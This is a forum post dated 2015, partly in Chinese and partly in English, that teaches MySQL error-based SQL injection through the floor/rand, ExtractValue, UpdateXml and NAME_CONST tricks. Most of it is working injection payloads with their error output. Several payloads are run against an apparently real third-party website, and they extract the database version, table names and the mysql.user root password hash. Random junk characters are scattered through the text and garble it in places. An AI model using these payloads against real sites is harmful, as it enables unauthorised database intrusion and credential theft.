|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:
; Z" F0 M' M, @, s首先进行正常查询: mysql> select * from article where id = 1;
0 \+ ]0 T8 M2 h& g" |6 ?0 Y+—-+——-+———+
; ^- ~% b% V' {5 {# }| id | title | content |
5 @& u( P# _: r- e; y# I4 Z+—-+——-+———+
& }0 ^! u v% F- m| 1 | test | do it |% \6 M& m. }3 x s' V3 z1 C
+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
4 X& Z$ O* N pERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
" \- w8 {, g( C% ^5 l1 @: F1 q例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
$ ^5 h' z N C# I- p" bERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
* x T, L- j' o# XERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue
# ^8 k6 ^& i& @9 S测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
" R3 r; t2 w2 I+ p# R8 P& nERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’ % S% e! b }) c" _" X9 t% z
1 h" D. K6 N. G+ G
再收集: : e2 v: R' F4 P/ w
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
1 p: @2 O+ {! p; g! P, k* l. ^+ r/ c5 o% a* L, a2 j" e7 `8 y
Error uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’. w% q6 P' x5 I% L7 f% t+ c z
4 P. ~# R+ D* y- G" jhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
( h5 z8 o$ Q P/ {& v; Z
& o8 \- J7 a0 _Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
3 }& n" I' v+ r. Q8 P- z( A( ?
% O& v- `3 j% s' l4 ^. MMYSQL高版本报错注入技巧-利用NAME_CONST注入
3 l9 ~9 w( h' H. c/ @# j& NIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. # K# ]8 ]4 h1 T/ u+ N8 J
2 _0 Z( h9 J' l/ P' b' V
( m0 u7 ` ?6 Z% K: b1 c) j+ G相关信息
' u3 x; u5 i! K/ q) J: R
# {9 |7 r4 Z. v1 _7 C2 P& cNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
1 ?3 n8 ?) k7 e$ W2 H2 v5 P- R) Z% E* [- k& Q
Code:% b5 c! i& ]1 F+ n; W
NAME_CONST(DATA, VALUE)
7 t) X8 b3 y( X6 p2 a6 }- q% H6 i5 Y' Y* W# E, Y
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
& z& m1 W. ?# m+ g$ R, j" x( k/ `5 D, f, P/ t2 ?- q. W
SELECT NAME_CONST('TEST', 1)
v# ?& Z- z3 C4 S4 m
8 k. q7 E- |4 Q* o$ C4 r2 J( F) u% f
3 Z' l8 G3 T. t) S' N|---------------|
& s+ n$ }: S$ x' L| TEST |
, ^- M, P0 K# S q# V6 T7 G, e4 ?| |1 }& P1 T3 P( X% m5 }' Q9 k/ I
|---------------|* J# P$ Y5 |- q
| 1 |- Q$ S- \2 I8 t+ \$ y
| |
! h X3 u0 J( A4 z# }|---------------|* c; V7 ^3 w' T
/ G6 h3 t4 o: i$ \. h5 [) w v {2 E3 G" a! M6 T# p
6 k- B1 `, Q8 k. x
+ |4 ?7 X. D+ |http://dev.mysql.com/doc/refman/5.0/en/m...name-const
4 m: O" e" X0 M$ b! v4 `; t* k' LIntro to MySQL Variables
' d7 f" o0 ?7 Z( ^
1 z7 }' a+ ^6 B$ D7 [& dOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
/ G3 L' x' j$ [. v+ [! X/ F$ ?2 Q. l
Code:1 A9 l' I2 M& q- k7 t. v/ k
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261. h" {# q' i: _1 y% v$ l
4 s$ h# E7 o9 H7 R
" e" V1 z. J$ R! X1 ^9 r1 [+ S4 r6 \) x g
4 p! W* A3 d5 n2 [2 n2 z4 u# \( @$ h% h2 b
Code:" V* T1 L! y# l0 l# E: Q/ r4 M1 D
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--1 T( T# t/ @( G$ I* x; E, w
# {' ~6 t, r$ t- k, B
9 P/ w6 p! ~; r: s. |VAR = Your MySQL variable." [6 S+ ~: V; h8 W) k+ x9 t
! [# Q& u" c3 k8 o% I# i
MySQL 5.1.3 Server System Variables, |2 `7 C0 ]; J1 M- p% n% R
1 i* X/ G& _* I2 F
Let's try it out on my site..( n0 I& |6 T, N, S* R
' C( M/ p6 z* G, k2 o6 aCode:' X& d% X+ W! D( S2 A
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--% C8 Y9 _2 ~1 Z& F2 K6 J
% P' U- F! R& D# W. SErroruplicate column name '5.0.27-community-nt'
0 t6 t& p7 m$ b4 w w1 ^6 e
+ D2 [. n' V+ q3 m
; A& ?% a' B; D8 B/ |0 n
3 Y8 F7 A5 [8 M* j5 ^* f+ `/ E
& u# p# `! J7 k6 W( P2 q. }. f3 E
I9 ?3 Y7 t7 k3 e9 C/ s% pNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
; c* F( Q. M* \+ r. B* v( l% c2 I. n8 q
Data Extraction
% t, B; t1 h! t3 r g: n8 d- v7 s9 X T; D4 Y: {2 N8 O
Code:
9 N/ Q/ {* x$ G( s$ j6 r. l7 g0 e0 b+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
% ?5 t. l1 f8 m
* i; t4 v6 Q4 ~: q A( `4 p% u4 s, y) D" p) Y o
We should get a duplicate column 1 error...
) a' M' {) N) `
) S4 i; W- }8 o" H( x3 R- FCode:/ u+ U. C7 d9 s$ w
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--3 Q6 Y$ T6 `* G$ E8 W! s _
1 q% P6 }+ l8 n6 `+ {9 U
Erroruplicate column name '16 T1 H% n# K; v- t% v
7 ?* }5 k6 g& C' p5 h' o
/ ]$ i& M. W, F2 Y" p" g# _9 g1 I. P2 o6 r
) p1 E( r5 u3 F; b$ d4 T
5 j' X; q3 `2 U; I
; V$ l/ M9 t$ kNow let's get the tables out this bitch..
% a" h7 \$ t; b" C; Y0 E9 Q1 E
2 J* A$ F1 ]7 O iCode:! Y* b: D/ v- @! e2 Q; \8 E, z$ [
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
* D/ z- O5 Q( B; Y; X3 |& A. { S# T1 T4 M
4 ?+ t- M5 U0 `* D( S7 VLet's see if it works here, if it does, we can go on and finish the job.
. ` z; }3 X) j% x7 ?1 q9 a% p. O6 `( b. U. H0 B" w
Code:2 H; J4 @& A# D9 }' x' v0 A
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
# i5 s1 f$ ^7 ?- C: q
( ]$ E- n; j8 W `" j, w& n5 q2 ^. T. R& B
Erroruplicate column name 'com_admanage
9 M$ |7 Y" \5 s$ a% r9 j; ~' O; M4 e* Z
$ u4 U" i& X' i( W
5 I, q W- F2 J
7 W* F! [8 X) k: O. A' K6 l+ s4 a$ `( ^& ^8 D3 [
3 \; |4 z/ z9 Q$ w) O7 p0 K8 k" I+ E# p
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.% m' u* g! m' V M+ @
; L; N8 K1 V1 C4 J& Y0 f% ]: tLet's get the columns out of the user table..1 Z7 |! g" ~, P- J5 M7 q! |
( V! L! y; q) Y5 E+ d
Code:
8 e' k4 C3 x y8 i. l8 [6 c+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)-- w9 x! v% O8 ?" J* W: ?
% p: d: g4 E# a: p! i
n+ K/ V8 P5 a# g2 `- ?! S
So mine looks like this, and I get the duplicate column name 'Host'.
% g$ _/ U! w3 _) e3 x- J
5 Y- j: m" ]; m6 Z9 N! pCode:' J& j9 L0 D, c
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--% o* X: G4 H2 N
: G' f9 f9 G1 q7 m
Erroruplicate column name 'Host'
7 S7 r) S# d" X+ t* F* [6 l1 n+ |% b9 K% ^
/ W" Q6 |0 [2 ~! D, f7 R
' x6 H7 s$ A9 w/ U$ R
" |' t' L. U6 W) d! @
! ]" G& B% D1 G- P
2 b; y1 W0 V) B) Q- u9 G6 ?Woot, time to finish this bitch off." N0 t5 a3 m9 X9 M& Y3 T
+ O9 V7 }* d6 A6 B
Code:4 M8 }3 q2 E3 j1 R
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--; `- o1 c+ M0 k; }2 A: n- R
/ g) l8 r+ x9 ?* e1 x6 ?6 I
* d) R: @) m( S' x: dSo mine looks like this...
7 w- S! M$ ]: }" \# l2 s. `/ q @, T f& F: I/ h3 g
Code:
, U: \" y1 Z, I0 d0 ^/ ?, Ahttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--" M2 Y( z2 F6 Q6 P) E
& P! z! M# ^" p4 H0 V, ^, dErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'( t1 Z k( a+ e/ ]) G
9 X1 F+ }1 T& S7 t, w
; d+ x3 F0 [9 G; c3 X( H( s+ ~ t 5 U8 P2 n! }& j$ `+ t5 a
|: z' e" |, x
: v/ s& T# K1 }
$ r X# _& P+ |/ c |0 IAnd there we have it, thanks for reading.; o9 f8 h7 E& M9 l) x% s1 J
( P/ l0 K1 W; C9 w |
发表于 2015-11-11 19:03:37
收藏
支持
反对